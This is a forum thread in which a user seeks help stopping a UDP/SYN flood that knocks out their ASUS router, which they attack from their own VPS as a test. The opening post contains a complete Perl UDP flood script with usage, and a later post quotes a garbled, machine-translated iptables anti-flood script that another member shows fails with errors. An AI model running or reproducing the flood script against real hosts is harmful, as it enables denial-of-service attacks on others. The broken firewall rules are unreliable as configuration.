Menu
What's new
By:
Filters Better Search

RT-AC66U_B1 PERL ATTACK

  • SNBForums Code of Conduct

    SNBForums is a community for everyone, no matter what their level of experience.

    Please be tolerant and patient of others, especially newcomers. We are all here to share and learn!

    The rules are simple: Be patient, be nice, be helpful or be gone!

M

Miguel

Occasional Visitor
Hello everyone I am a little desperate with my router and firmware merlin, I am testing DDOS attacks with a script in perl and my wan and lan are falling, I have the option of firewall and ddos enabled but it is impossible to configure some script in jjfs To prevent the router from saturating itself?
I need help please

perl ddos.pl xx.xx.xx.xx 0 1 10
Code: 
#!/usr/bin/perl

#Args
# 1 - IP
# 2 - Port
# 3 - Size of the packet to send
# 4 - Time in secondes

use Socket;
use strict;

if ($#ARGV != 3) {
  print "-Tip on use : perl DDoS.pl 8.8.8.8 80 2048 500\n";
  exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print "~To cancel the attack press \'Ctrl-C\'\n\n";
print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
print "To cancel the attack press 'Ctrl-C'\n" unless $time;
for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1500-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
 
If you have DROPPED packet logging turned on during your test, try turning off all packet logging. I've seen that the syslog flood can cause problems.
 
You need to be testing this from the internet side. It won't work if you're testing from your LAN.
 
And running Perl on the router's limited CPU and RAM is probably not a good idea either.
 
I am sending the attack from a vps to my home where the asus router is, with a connection of 100mbps but my connection is 300mbps, it seems to be overloading the router in packets
 
RMerlin said:
And running Perl on the router's limited CPU and RAM is probably not a good idea either.
Click to expand...
When I launch my attack and the router becomes accessible again I see these log.

Code: 
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=1539 DF PROTO=UDP SPT=34309 DPT=57378 LEN=9
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=65474 DF PROTO=UDP SPT=34309 DPT=46671 LEN=9
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=4599 DF PROTO=UDP SPT=34309 DPT=63405 LEN=9

I have hundreds of equal entries, I think the router is not able to block so many packets, I have a more basic router and supports the load better
 
Miguel said:
When I launch my attack and the router becomes accessible again I see these log.
.....

I have hundreds of equal entries, I think the router is not able to block so many packets, I have a more basic router and supports the load better
Click to expand...
I thought you said you had packet logging off????
 
I load script on router asus

But without results, I sadly bought the router thought it would solve some problem of my attacks but I see that throw the money.
Code: 
]

Como utilizar # Se Declara El Golpe de la ONU de Como

#! / Bin / bash

# Se crean los Archivos Donde sí alojaran las IPs Para Las Listas Negras;

iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP

# Detener el ICMP Flood
#Crear la Cadena parrafo inundación ICMP
iptables -N cadena-ICMP-inundación

# Detectado Saltar a la Cadena ES Cuando El ICMP
iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones

# Salir de la Cadena, Si La tasa de Paquetes De La Misma IP es inferior a 4 por Segundo con Una ráfaga de 8 por Segundo
iptables -A -m Límite-Cadena ICMP-inundación --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Límite ICMP" -j RETORNO

# Registros de inundación CUANDO La tasa es mas alta
iptables -A cadena-ICMP-inundación Límite -m --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación ICMP"

# Mandar Una Lista Negra a por la IP 3 Minutos
iptables -A cadena-ICMP-inundación -m Reciente --name blacklist_180 --set -m comentario --comment "ListaNegra origen IP" -j DROP

Inundaciones # Detener el UDP

parrafo Inundaciones UDP # Crear la Cadena
iptables -N cadena-udp-inundación

# Detectado Saltar a la cadena Cuando El UDP es
iptables -A ENTRADA udp p -j Cadena-UDP-Inundaciones

# Limitar la Velocidad UDP a 10 / Segundos con limite de 20
iptables -A -m Límite Cadena-UDP-inundación --limit 10 / s --limit estallar-20 -m comentario --comment "Limite Velocidad UDP" -j RETURN

# Iniciar sesión
iptables -A Límite -m cadena-udp-inundación --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación udp"

# Denegados POR flooders 3 Minutos Parr
iptables -A cadena-UDP-inundación -m Reciente --name blacklist_180 --set -m comentario --comment "ListaNegra origen IP" -j DROP

Inundaciones SYN # Detener

# Crear la Cadena syn-Inundaciones
iptables -N cadena-syn-inundación

# Saltar a la cadena sin-inundación Cuando El paquete es detectado
iptables -p TCP ENTRADA --syn -J Cadena-syn-Inundaciones

# Limitar la tasa de Paquetes De Dos por Segundo, Con Un 6 por Segunda ráfaga
iptables -A -m Límite Cadena-syn-inundación --limit 2 / s --limit-burst 6 -m comentario --comment "Limitar Velocidad TCP SYN" -j RETURN

flooders # Entrar
iptables -A Límite -m cadena-syn-inundación --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación syn"

# Prohibir flooders por 3 Minutos
iptables -A cadena-syn-inundación -m Reciente --name blacklist_180 --set -m Comentar --comment soltar "IP de origen de Lista negra" -j

Inundación # Detener Otros Tipos de Ataques de SYN
iptables -p tcp ENTRADA! --syn comentario -m NUEVO --comment estado -m --state "Cortar La Conexión TCP SYN Que No empiezan por" -j DROP [/ code]
 
Miguel said:
I load script on router asus
Click to expand...
I hope you are not trying to use that script because it is full of errors.
Code: 
# iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP
Bad argument `listanegra'
Try `iptables -h' or 'iptables --help' for more information.

# iptables -N cadena-ICMP-inundacin

# iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones
Bad argument `Cadena-ICMP-Inundaciones'
Try `iptables -h' or 'iptables --help' for more information.

# iptables -A -m Lmite-Cadena ICMP-inundacin --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Lmite ICMP" -j RETORNO
Bad argument `Lmite-Cadena'
Try `iptables -h' or 'iptables --help' for more information.

#
 
ColinTaylor said:
I hope you are not trying to use that script because it is full of errors.
Code: 
# iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP
Bad argument `listanegra'
Try `iptables -h' or 'iptables --help' for more information.

# iptables -N cadena-ICMP-inundacin

# iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones
Bad argument `Cadena-ICMP-Inundaciones'
Try `iptables -h' or 'iptables --help' for more information.

# iptables -A -m Lmite-Cadena ICMP-inundacin --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Lmite ICMP" -j RETORNO
Bad argument `Lmite-Cadena'
Try `iptables -h' or 'iptables --help' for more information.

#
Click to expand...

Maybe that does not work, is there any script that can load in the asus? My knowledge in iptables are scarce, is there any way to avoid synflood? The iptables that brings by default does drop but the router gets saturated.and I lose the wan and lan.
Sorry my bad english


When I launch the attack from the vps to my home with the Asus router does not respond to the gateway lan to ping until the attack ends
 
Last edited:
Because this message has the words "perl attack" in the link, I had to Avast disable my A/V just to view and post...good luck with your script.
 
You must log in or register to reply here.

Similar threads

Viktor Jaep
vpnmgr Randomizer Script for Nordvpn
Replies
8
Views
2K
Viktor Jaep
Viktor Jaep
S
ASUS RT-AC1200GU SAMBA slow transfer speed
Replies
7
Views
6K
FTC
FTC
A
Bypass Plex traffic on router running vpn client, Working good so far, Testing for few days
2 3
Replies
57
Views
11K
Austin Dean
A
ASAT
Fast HTTP pixel image server for ad blocking
Replies
13
Views
3K
ASAT
ASAT
M
step-by-step setup of fwknopd - need help (also with iptables)
Replies
1
Views
4K
Martin - SNBuser
M
Similar threads
Thread starter Title Forum Replies Date
N Upgrade time ... RT-AC66U-B1 to RT-AX68U? Asuswrt-Merlin 47
M Issue Updating Merlin Firmware to 386.12_2 on my ASUS RT-AC66U B1 Asuswrt-Merlin 2
A AC5300 with Merlin can I use RT AC66u_B1 as a mesh node with either stock Asus FW or the AC66U merlin FW? Asuswrt-Merlin 11
N Asus AC66U and full cone NAT Asuswrt-Merlin 11
B AiDisks under password guessing attack Asuswrt-Merlin 4
TanyaC Possible DNS-Rebind attack detected and unresponsive router plus one more Asuswrt-Merlin 3
H Solved DNS Rebind Attack Message For Only Two Domains Asuswrt-Merlin 4

Similar threads

Latest threads

Sign Up For SNBForums Daily Digest

Get an update of what's new every day delivered to your mailbox. Sign up here!

Members online

Total: 759 (members: 28, guests: 731)
Top